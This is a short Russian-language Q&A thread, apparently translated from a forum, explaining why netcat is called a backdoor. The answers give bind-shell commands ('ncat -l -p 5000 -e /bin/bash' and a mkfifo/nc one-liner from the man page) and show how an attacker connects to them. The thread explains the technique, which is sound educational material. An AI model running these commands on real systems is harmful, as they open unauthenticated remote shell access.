Значение "netcat можно использовать как бэкдор"
Я недавно читал о netcat, и часто упоминается, что его можно использовать как "черный ход". Что именно подразумевается под бэкдором? Может кто-нибудь привести пример такого использования netcat.
2 ответа
С помощью netcat простой пользователь может создать удаленную оболочку. Например, следующая команда позволит удаленному пользователю получить доступ к оболочке bash через порт 5000
ncat -l -p 5000 -e / bin / bash
Все, что атакующий должен сделать после запуска:
IP-адрес ncat 5000
Вы даже можете попробовать этот пример на своем компьютере.
Однако это будет работать только через Интернет, если нет брандмауэра, блокирующего доступ к порту 5000.
Все, что может прослушивать входящие сетевые соединения (например, Perl, python, zsh, socat, inetd), можно считать бэкдором.
Основная причина, я думаю, почему nc в частности, он может рассматриваться скорее как бэкдор, чем другие (хотя в этом отношении у него гораздо меньше возможностей), так как на его странице руководства показан пример такого бэкдора:
$ rm -f /tmp/f; mkfifo /tmp/f
$ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f